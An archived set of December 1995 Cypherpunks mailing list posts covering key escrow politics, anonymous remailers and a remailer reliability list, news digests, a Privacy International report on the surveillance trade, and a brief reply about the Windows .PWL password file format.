Content-Type: text/pgp


-----BEGIN PGP SIGNED MESSAGE-----

Message-Id:<v03003e00ace84506f548@[129.46.82.85]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Sender: Level Seven Design
X-PGP-KeyID-Fprnt: 4AAF00E5 - 30D81F3484E6A83F  6EC8D7F0CAB3D265
X-PGP: http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=lsd
X-Floppyright: (f)1995 LSD.com _ Unlicensed retransmission prohibited.
Date: Mon, 4 Dec 1995 04:40:07 -0800
To:  cypherpunks@toad.com
From:  Dave Del Torto <ddt@lsd.com>
Subject:  GAK the Spooks not the Civilians
Cc:  hungary-online@hungary.yak.net, zamir-chat-l@igc.apc.org

#define GAK Government Access to Keys, aka "key escrow": a copy of the
secret half of your secret/public cryptographic key-pair, normally known
only to you, is held in a "vault" somewhere by your government in case they
decide they need to read your encrypted private email with/without your
knowledge.

Here's an argument in favor of a _limited_ GAK* system, and a timely
example of why I think it's necessary. As I see it, there are two main
varieties of GAK-mail:

  #1: GAK for Citizens' keys
  #2: GAK for Government employees' keys

I'm disregarding #1 right off as being totally unacceptable, but I favor a
form of #2 "...of, by and for the People" directed at the government itself
and monitored by the elected representatives of the Executive and
Legislative branches as perhaps being essential to Democracy's survival.
Where official business is concerned, some form of GAK could go a long way
toward preventing the majority of everyday abuses by subrosa forces in a
government. It might be useless to aim it at teflon-coated, black-budgeted
outfits like the CIA or NSA, but it could keep a lot of other officials
honest as they go about doing the everyday business of running OUR
government for us through email.

One of the main reasons that the TLAs are pushing so hard for GAK is the
Culture of Distrust they stew in. They choose it: they breed and feed upon
and among the very sorts of minds who become involved in covert activities:
spooks. A Spook Culture begets a Spook Attitude towards other spheres of
social interaction -- like secure email between PGP, Eudora and Netscape
users who just desire private communications. I think this Spook psychology
is unavoidable, but if they'd just stick to loosing their creations on
*themselves*, then fine.

I just learned from CBS's "60 Minutes" program, along with millions of
other Americans, about a disturbing event involving the Clinton
administration, the State Dept and the CIA. I say "alledgedly" to be fair
(after all, no indictments have been handed down...yet) but it looks
reasonably clear to me: the interview was with the main individual involved
and he was quite clear about what had happened. Even if it's untrue, it's a
roadmap for what could easily happen if back-channel operators are allowed
to run the government during those milliseconds when the people we elect to
do it turn their heads.

You may remember the incident not so long ago where a US naval vessel was
set to deploy a peace-keeping force of Marines in the capital city of Haiti
so that President-elect Aristide could later assume office (foreshadowing
IFOR). The USS Harlan County was within a few thousand meters of docking,
when a small riot developed on the quay (in full view of camera crews).
Clinton decided reluctantly to abandon the landing at the last minute.
There were apparently only 40 or so FRAP members involved, but there they
were on the US nightly news that evening (interesting, but another topic).
One "Mr. Toto Constant," a leader of the right-wing Haitian militia group
FRAP and reportedly a longtime CIA contact/operative, claimed in an
interview on the CBS report that he met with the CIA station chief in
Port-au-Prince BEFORE the scheduled landing and assured him that the
planned FRAP "media frenzy" on the docks was going to be peaceful, was to
be performed for the benefit of the cameras only and would be no threat to
US personnel whatsoever. The CIA refused to confirm these allegations, but
according to CBS, Warren Christopher later implied that Constant was
telling the truth about having dealt with the CIA in the past. Hmmm.

The plot thickens: this CIA station chief alledgedly then disinformed
President Clinton, the Secretary of State Christopher and the cabinet (and
one assumes the Congressional overseers as well) about Mr. Constant's
assurances that there was no danger to the US Marines. Because he was
unaware of the lack of a real threat and because he was also misinformed by
the CIA that there might in fact be a threat, Clinton's hand was forced by
popular fears and media speculation about another "Somalia" scenario, and
he made the difficult decision not to land the troops. The domestic result
was cries of "cowardice" from conservatives and frustration among US
voters. Does this smack of Watergate-style dirty tricks to anyone besides
me? Rogue elements in the CIA manipulate intelligence information, provide
the President of the US (up for re-election) with faulty information,
advise him to make an embarrassing foreign policy decision in contradiction
to information they possess and then conservatives in the US Congress and
Republican party accuse him of being soft and unable to show leadership.
And people suggest Fred Cohen is overdoing his caffein intake? Pour me a
cup, Fred. These are the same guys suggesting they'll hang on to a copy of
my secret key. Yeah, sure.

The riots quickly evolved into murder squads consisting of Haitian military
units and former Ton-Ton Macoutes who purged the Aristide supporters among
their fellow Haitians until Clinton sent Jimmy Carter down, followed
closely by the Marines. The resulting genocidal catastrophe was an
atrocity, a blow against Caribbean stability and a major embarrassment to
the Clinton administration. Meanwhile, the CIA (and maybe Army and Navy
Intelligence) quietly raided a Haitian facility and "confiscated" 150,000
items of evidence, which they still refuse to turn over to Aristide, even
though it reportedly contains info on the CIA's contacts within FRAP, the
group still trying to destabilize his government. To add insult to injury,
the US still insists Aristide step down in February 1996, years short of a
full term, if you count the time he spent in forced exile after his
original election while the Haitian elite stripped the paintings off the
walls and headed for Switzerland. It's hard to blame Aristide for being a
bit upset about under these circumstances, but he made his bargain with the
You-know-what...

Besides the Haitians who died in the subsequent political violence, and the
blow to the stability of the developing Haitian democracy and US foreign
policy, this incident, even if it only has roots in the truth, is a
troubling indication that "shadow governments" operating inside and behind
the elected US governement have a profound effect on our lives. After all,
it's CIA intelligence that supposedly tells us when it's safe to drive the
1st Armoured's A-1's down to Sarajevo, right? It also brings up some other
interesting questions:

+ Did CIA take the same guy they had in Haiti and rotate him to Bosnia to
   lunch with Karadzic?
+ Information is power: do the intelligence services of our government
   wield it _at_ their own Executive branch "handlers?"
+ In this climate, are CIA and related intelligence branches having an
   impact on the specifications (eg. Fortezza) for methods and systems
   that could exert controls over the information we as citizens can
   keep private -- solely for purposes of self-preservation?

If the Executive branch's policy initiatives (whether we like them or not)
are at the mercy of forces WITHIN it, how can they possibly hope to store
our escrowed keys safely, much less guarantee a US democracy? Who is it in
the White House that keeps an eye on the message traffic of this CIA
station chief? Who keeps a copy of HIS secret key escrowed and who vets the
intelligence he generates before it ends up at cabinet-level
decision-making meetings where US troop movements are decided? Just who the
heck is running this country? Sure, Clinton and Gore want a national crypto
policy: given what their own dogs may be doo-ing it's not that hard to
understand, but hey, watch where yer pointin' that GAK there, Bubba.

Granted, the more crypto-savvy ophidians in the intelligence services are
bound to find other methods for passing such conspiratorial information if
they are prone to that, but how many bottom-feeders in our government are
trying little maneuvers of this nature through "normal" channels - and how
much of _that_ type of activity should be actively monitored (and who
polices _those_ police)? Maybe we need to take a closer look as a nation at
implementing a better GAK system for the State Department and the
Intelligence branches.

BTW, the CBS reporters at "60 Minutes" (Ed Bradley, et alia) received a
faxed CIA statement while preparing their report, stating that "...the CIA
collects and analyzes intelligence, it does not formulate policy..." and
that any implication that they manipulated intelligence regarding the
Hatian incident "is false." Excuse me while I clear my throat.

So, make those GAK versions for the feds, Netscape, but be sure you make
the rest of us a vanilla version. I don't need to send my mail from
Netscape: I'll stick with an untampered PGP for now. Clinton should require
GAK for govt employees doing official business only: if they go home, boot
up a non-GAKed system and start sending mail to their spook peers, their
traffic should be monitored and they should be hauled up in front of
Congress. Hey, couldn't be all bad, right? Later, they can write a book
about their experiences, and maybe run for public office like Ollie North.
;)

   dave


____________________________________________________________________________
"I mixed this myself. (holds up glass of water) Two parts "H," one part "O."
 I don't trust _anybody_!"                                  --Steven Wright




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Verbum sapienti satis est.

iQCVAwUBMMLsQKHBOF9KrwDlAQEgYQP+ITWALlvdS68sdkydQwG/DMgJ1CSI01wX
X1U3yWG6txLykUppFPP3hs476KqHLpoeL1tCscj2QRCqYY1sz4NoZ3ZEkJXcMP1Y
6Qt/KpHr/AXTDSDQD7QIFIYzZ4S+69hXiMV7mSK76nRLkbke8REA+k15w03atN+R
2l/vGhu4mzo=
=DeD3
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 4 Dec 95 05:27:04 PST
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED.
Message-ID: <199512041326.FAA19260@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995, Don M. Kitchen wrote:

> Someone posing as Alice said:

It wasn't anyone "posing" as Alice.  It was the real banana.

> > As I promised, I've now opened a channel so that anyone who wants to
> > can send Alice de 'nonymous email.  I can now be reached via
> > an455120@anon.penet.fi.  Mail sent to Alice de 'nonymous at that
> > address will get to me, and I will do my best to reply to you as well,
> > but I can't guarantee, anything.
> 
> Laszlo Vecsey <master@internexus.net> said:
> 
> > I don't think that was a smart thing to do. Your real email is now 
> > registered in some database in Finland - how difficult would it be to 
> > retrieve it? From what I remember organizations like Scientology had no 

Soory ... beg to differ ... my real email is not registered in some 
database in Finland.  No offence, but you have no idea what I have 
registered in Finland.  Whatever lies behind the anon address is simply
something which is "reasonably" reliable.  It could be a dummy account, 
or it could even be a chain of remailers and processes.  

Who knows??  Do you?

How difficult would it be to retrieve it from Finland?  I don't really
know.  It really hadn't crossed my mind.  I thought that Julf might run a
good outpost in Finland.  And that he'd take reasonable efforts (i.e. not
go down with the ship) to protect my privacy. 

He strikes me as reasonably reliable that way.  

> Not _nearly_ as hard as breaking/finding an appropriately encrypted key.

Maybe, maybe not.  It depends on a lot of things, now doesn't it?  And
breaking or finding an appropriately encrypted key, doesn't *quite*
address the problem of people sending email to me without any hassle,
does it?? 

I think that the ISP who hosts my remailer has already had to deal with
a slew of mail over the "Alice" antics, and the spoofed posts.  This way, 
if someone wants to take issue with something which they've read, the 
ISP can simply ask them to write the author.

> I for one am not going to even bother with the penet address unless the
> posts come from there. After all, it's a forgery anyway. The real Alice
> already posted a PGP key. I wouldn't be reading this list if I were
> going to fall over for a simple impersonation.

Great that's your choice and your perogative.  I don't see what on earth
you'd have to say to me in any event.  And before you go patting yourself
on the back about impersonations, have a look at my last post to this list. 
The one under the subject of "Do the Right Thing." 

Right at the bottom of the post is my signature, and ... ta dah ... my
penet address.  What does that *logically* tell you??  

Maybe that the author of that post, the long-winded one that criticizes 
Jim Clark for his stand on GAK and his short-sighted views will accept 
email via penet.fi at an455120@anon.penet.fi?? 
 
> Of course, if our impersonating, trusts-penet-not-PGP-coworkers-think-
> of-everything-but-a-packet-sniffer Alice were to post from penet,
> then everyone (including procmail ;) would have to believe his claims
> of pseudo-identity.

I trust penet to do one thing for me.  I trust penet not to send me email
that is larger than 1 Megabyte.  And the reason I trust penet not to do 
that is that Julf's mailer won't handle it.  His mailer will choke on it.

That's it.

If you think that I'm relying on Julf to protect me, then you are sadly
mistaken.  Many, many people already share in the secret of who Alice is. 
That's a fact.  I'm not looking for anyone to keep my identity a "secret". 
I'm simply looking for some peace so that I can do some reading, some
writing, and some "thinken".  And Julf protects me from huge emails.

That's it.  And now, if anyone wants to establish a dialogue with me, 
they can.  Or if they don't want to (like you) then that's not a 
problem for me either.  

My previous way of getting contacted (via postmaster@att.com or
postmaster@netscape.com) didn't seem to be working well.  The two
companies weren't forwarding email to me.  Never got anything from 
them forwarded.

Now, not only AT&T and Netscape can talk with me, so can anyone else.
And if they want to have some "secure" super-secret dialogue with me, then
we can do that also.  I've posted a partial protocol on how to do that
already.  Not one that's for super-dee-dooper secret stuff, but one that's
Pretty OK.  And it uses PGP for one part.

> I must say, L.D. is really falling all over himself this time. Maybe
> he's just trying to make people *think* he's a cryptobungler, so that he
> can keep his other tentacles with whom he converses out of suspicion.

Good Grief.  Is it something they put in the water down wherever 
you're at??  I am not L.D ... oh, what is the point ...

> Don
> 
> Wishing Emacs had IMAP support cuz here comes mailcrypt

Mailcrypt??  Emacs??  *Shudder* ... is it compatible with PGP 2.3?



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 4 Dec 95 06:50:08 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199512041450.GAA06784@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last update: Mon 4 Dec 95 6:47:39 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hroller  hroller@c2.org                   ---########*     7:37  99.98%
hacktic  remailer@utopia.hacktic.nl       * *** ******     7:13  99.59%
rmadillo remailer@armadillo.com             ++++++++++    40:07  99.51%
portal   hfinney@shell.portal.com           *##* #+*##     2:31  99.27%
c2       remail@c2.org                    - +*****++-     48:01  99.14%
extropia remail@extropia.wimsey.com         ----.---.   7:39:43  98.95%
vishnu   mixmaster@vishnu.alias.net         * *** *#**     5:22  98.88%
spook    remailer@valhalla.phoenix.net      **   ..-**  3:29:17  98.79%
flame    remailer@flame.alias.net           ****** ***    17:26  98.78%
amnesia  amnesia@chardos.connix.com          *- --+- +  1:52:55  98.67%
ecafe    cpunk@remail.ecafe.org           # ## ##  ###     7:56  98.58%
wmono    wmono@valhalla.phoenix.net          **   *  *    12:35  98.13%
shinobi  remailer@shinobi.alias.net         +*-  + --+    45:49  97.35%
alumni   hal@alumni.caltech.edu             +*     *#*     3:38  96.35%
bsu-cs   nowhere@bsu-cs.bsu.edu             # ### ## #      :17  95.83%
ideath   remailer@ideath.goldenbear.com     .-. ...- - 17:35:13  95.65%
replay   remailer@replay.com                **   *   *     5:12  95.51%
mix      mixmaster@remail.obscura.com     .--.---.-     9:59:28  94.15%
rahul    homer@rahul.net                    +* **** +*     7:33  99.00%
penet    anon@anon.penet.fi               - -+ -  -    10:45:41  82.20%
gondolin mix@remail.gondolin.org                     -  2:06:09  81.59%
ford     remailer@bi-node.zerberus.de      ++   .---   14:40:50  79.58%
robo     robo@c2.org                      --*####    #    14:09  69.63%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Dec 95 04:49:47 PST
To: cypherpunks@toad.com
Subject: SEN_sor
Message-ID: <199512041250.HAA03141@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-4-95. NYPeeper:

   "The Rand Corporation salutes E-mail as the new foundation
   of democracy." Denise Caruso's column.

      Are we ready, as a society, for ubiquitous Government-
      mandated electronic communication? Not yet. E-mail today
      does not have the same constitutional free-speech and
      privacy protections already afforded the telephone and
      postal mail. In addition, free speech on the Net is far
      from assured. There are several bills pending in
      Congress right now that would severely restrict what
      people can say in either private or public forums on the
      Internet. Despite Rand's finding that virtual
      communities are powerful tools for democratic discourse,
      it will be difficult for communities to form under
      constant threat of censorship.

   "Java Backers Taking Aim At Microsoft's Dominance."

      A number of Silicon Valley companies plan announcements
      on Monday that together constitute an anti-Microsoft
      campaign. The most noteworthy: A plan by Sun and
      Netscape for a user-friendly version of the Java
      software technology for the Web. The strategies being
      announced this week represent opening skirmishes in what
      may be the next great standards battle in the industry.

   "Nearing the $500 Computer for Internet Use."

      Acorn is about to introduce a stripped-down machine for
      Net surfing that sells for about $900. By stripping it
      of its monitor and hard disk drive, and adding a
      high-speed modem, Acorn executives say they can hit a
      retail price less than $500. They plan to ship the
      Netsurfer by early next year, and are discussing
      licensing with Oracle and a number of American and Asian
      companies.


   SEN_sor  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Mon, 4 Dec 95 09:16:08 PST
To: sameer <sameer@c2.org>
Subject: Re: "Got a subpoena?"
Message-ID: <m0tMeLx-00091DC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>> 
>> Note that I am assuming the willingness of the phoneco to be UNCOOPERATIVE, at least according to "the spirit of the rules."  They could still cooperate according to the LETTER of the law.
>
>	It's in the phone company's best interest to be cooperative.
>*but* in the case of, say, an internet privacy provider, it is in the
>provider's best interest to be uncooperative.


I would PREFER that I be able to legally obligate my service provider (and phone co) to provide only that level of cooperation which is actually, literally, legally required.  I would like to be able to know that if my service is tapped in some way, I receive a letter de-certifying the previous state of non-tapped-ness that it possessed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 Dec 95 06:25:06 PST
To: cypherpunks@toad.com
Subject: GAK_hit
Message-ID: <199512041425.JAA18561@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-4-95. W$Jabber:

   "Microsoft Probe Spurs Subpoenas Tied to Internet.
   Antitrust Effort Appears Focused on Windows 95 Disabled
   Rival Software."

      The subpoenas indicate that Justice Department officials
      are focusing on whether Microsoft's Windows 95 and
      related Internet software improperly disable rival
      programs that let users access the Internet. Industry
      executives said the Justice Department has issued "civil
      investigative demands" to Netscape and CompuServe.

      The subpoena issued to Netscape may be of particular
      significance. In the estimate of Netscape and industry
      observers, roughly 80% of World Wide Web users, a
      population pegged at more than 17 million, use
      Netscape's software. Because of that presence, even if
      Netscape were alone in having its software disabled by
      Microsoft's new products, "I would say Netscape would
      have a cause of action and that the Justice Department
      would have a basis to investigate or bring an action,"
      said Garret Rasmussen, an antitrust lawyer.

   GAK_hit  (5 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 4 Dec 95 01:41:36 PST
To: cypherpunks@toad.com
Subject: RE: Do the Right Thing
Message-ID: <Pine.3.89.9512040911.A16085-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Timothy C. May wrote:

> "Events planned for this year's conference include:
> 
>     - Federal prosecutors square off against civil-liberties lawyers
>       in a Supreme Court test of the "Cryptography Control Act of
>       1996", which criminalizes non-escrowed encryption."

Shouldn't that be the "Child Protection, Anti-Terrorism and Electronic 
Privacy Act of 1996" ?

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Mon, 4 Dec 95 07:33:14 PST
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: PRIVACY WATCHDOG OUTS BIG B
Message-ID: <n1394049238.55375@epic.org>
MIME-Version: 1.0
Content-Type: text/plain



MEDIA RELEASE

Contact: Simon Davies, Privacy International
Davies@privint.demon.co.uk

PRIVACY WATCHDOG OUTS BIG BROTHER COMPANIES 

New report uncovers a massive international surveillance trade
funded by the arms industry and led by the UK

On Monday 4 December, Privacy International will publish Big
Brother Incorporated, a 150 page report which investigates the
global trade in repressive surveillance technologies. The report, to
be published on several Web sites on the Internet,  shows how
technology companies in Europe and North America provide the
surveillance infrastructure for the secret police and military
authorities in such countries as China, Indonesia, Nigeria, Angola,
Rwanda and Guatemala

The reports primary concern is the flow of sophisticated
computer-based technology from developed countries to
developing countries  - and particularly to non-democratic regimes.
The report demonstrates how these companies have strengthened
the lethal authority of the world's most dangerous regimes.

The report lists the companies, their directors, products and exports.
In each case, source material is meticulously cited. 
Privacy International is publishing the report in digital form in
several sites on the Internet to ensure its accessability by interested
parties anywhere in the world.

Surveillance technologies are defined as technologies which can
monitor, track and assess the movements, activities and
communications of individuals.  More than 80 British companies are
involved, making the UK the world leader in this field. Other
countries, in order of significance, are the United States, France,
Israel, the Netherlands and Germany.

_Big Brother Incorporated_ is the first investigation ever conducted
into this trade.  Privacy International intends to update the report
from time to time using trade fair documents and leaked information
from whistleblowers.

The surveillance trade is almost indistinguishable from the arms
trade. More than seventy per cent of companies manufacturing and
exporting surveillance technology also export arms, chemical
weapons, or military hardware.  Surveillance is a crucial element
for the maintenance of any  non-democratic infrastructure, and is an
important activity in the pursuit of intelligence and political control.
Many countries in transition to democracy also rely heavily on
surveillance to satisfy the demands of police and military. The
technology described in the report makes possible mass
surveillance of populations.  In the past, regimes relied on targeted
surveillance.

Much of this technology is used to track the activities of dissidents,
human rights activists, journalists, student leaders, minorities, trade
union leaders, and political opponents. It is also useful for
monitoring larger sectors of the population. With this technology,
the financial transactions, communications activity and geographic
movements of millions of people can be captured, analysed and
transmitted cheaply and efficiently.

Western surveillance technology is providing invaluable support to
military and totalitarian authorities throughout the world.  One
British computer firm provided the technological infrastructure to
establish the South African automated Passbook system, upon
which much of the functioning of the Apartheid regime  British
surveillance cameras were used in Tianamen Square against the
pro-democracy demonstrators.  In the 1980s,  an Israeli company
developed and exported the technology for the computerised death
list used by the Guatemalan police. Two British companies
routinely provide the Chinese authorities with bugging equipment
and telephone tapping devices. 

	Privacy International was formed in 1990 as a non-government, non-profit
organisation.  It brings together privacy experts, human rights advocates and
technology experts in more than 40 countries, and works toward the goal of
promoting privacy issues worldwide.  The organisation acts as an impartial
watchdog
on surveillance activities by governments and corporations.

For further information or interview, contact Simon
Davies in London at davies@privint.demon.co.uk.  The address of the web
site is  http://www.privacy.org/pi/reports/big_bro/




_________________________________________________________________________
Subject: PRIVACY WATCHDOG OUTS BIG BROTHER...
_________________________________________________________________________
David Banisar (Banisar@privacy.org)     *  202-544-9240 (tel)
Privacy International Washington Office *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.privacy.org/pi/
Washington, DC 20003                   

------------------ RFC822 Header Follows ------------------
Received: by epic.org with SMTP;3 Dec 1995 23:09:13 -0500
Received: from epic.org (washofc.epic.org [204.91.138.50]) by svcs1.digex.net
(8.6.12/8.6.12) with SMTP id XAA27478; Sun, 3 Dec 1995 23:07:51 -0500
Message-ID: <n1394090361.79608@epic.org>
Date: 3 Dec 1995 23:07:03 -0500
From: "Dave Banisar" <banisar@epic.org>
Subject: PRIVACY WATCHDOG OUTS BIG B
To: "pi" <pi@privacy.org>
X-Mailer: Mail*Link SMTP-QM 3.0.2




_________________________________________________________________________
Subject: PRIVACY WATCHDOG OUTS BIG BROTHER...
_________________________________________________________________________
David Banisar (Banisar@privacy.org)     *  202-544-9240 (tel)
Privacy International Washington Office *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.privacy.org/pi/
Washington, DC 20003                   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 4 Dec 95 08:10:13 PST
To: cypherpunks@toad.com
Subject: [farber@central.cis.upenn.edu: IP: NSC Announce -- iPower home page/CryptoSampler announcement]
Message-ID: <9512041608.AA26504@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


From a National Semiconductor press release...



     To order  the CryptoSampler package in either configuration, call
1-800-272-9959 Ext# 631 between the hours of 7 AM and 7 PM Central
Standard Time.  To play CryptoSolver and for more information about
the CryptoSampler program, see the iPower web site at
http://www.ipsecure.com  .




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 4 Dec 95 11:47:53 PST
To: Frank Andrew Stevenson <frank@funcom.no>
Subject: Re: Cracked: WINDOWS.PWL
In-Reply-To: <Pine.SGI.3.91.951204174641.2847A-100000@odin>
Message-ID: <Pine.ULT.3.91.951204113806.16412D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Very interesting.

Do you have information on the content of the various resource records
within a .PWL file? They should be the stored usernames and passwords for
every other authenticated service used by the "user profile."

I.e. the "default login," say, the local Windows password, encrypts the
.PWL file, and the contents are the passwords used for NetWare, NT,
Dial-Up Networking, the screen saver, .PWL-enabled "security" utilities,
etc.

If anyone wants a sample .PWL file including known values of all of the 
above, I can have it for you within a day. Of course I wouldn't want to 
give you any *real* passwords.

Of course I should just compile your code myself, but it's a busy day, 
and I'd hate to unnecessarily duplicate someone else's work...

- -rich
 moderator of the win95netbugs list
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMNP9Y3DXUbM57SdAQF+1wP/RFHvnjpne9bGsU6K8xxT3UPav2nt+8wR
2CUnY/Dm32bTDegx7QO8zpUVckNR2YwxG5ivZhBnov8UhMcngWdMLPjkdSCepPXP
cvKTTwAVknmxqLXkyuVSn06PGKlNz5RQnluop5s74IJ3nmJPAFnU+/pGWvlZY3cN
jh42jdlo/8s=
=zDbs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Mon, 4 Dec 95 12:04:36 PST
To: John Young <cypherpunks@toad.com
Subject: Re: SEN_sor
Message-ID: <199512041905.NAA02443@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> From:          John Young <jya@pipeline.com>
> Date:          Mon, 4 Dec 1995 07:50:16 -0500
> To:            cypherpunks@toad.com
> Subject:       SEN_sor 

>    12-4-95. NYPeeper:

>    "Nearing the $500 Computer for Internet Use."
> 
>       Acorn is about to introduce a stripped-down machine for
>       Net surfing that sells for about $900. By stripping it
>       of its monitor and hard disk drive, and adding a
>       high-speed modem, Acorn executives say they can hit a
>       retail price less than $500. They plan to ship the
>       Netsurfer by early next year, and are discussing
>       licensing with Oracle and a number of American and Asian
>       companies.

Oh, hell, even I can do *that*.  Let's see ... motherboard, $100.  
Floppy drive and controller, $50.  14.4KB modem, $50.  Case and power 
supply, another $50 or so.  $250 profit.

What's so tough about that?  Not a bad deal for Acorn, if you ask me. 
 Hell, maybe I'll go into business making the damned things for that 
kind of profit margin...




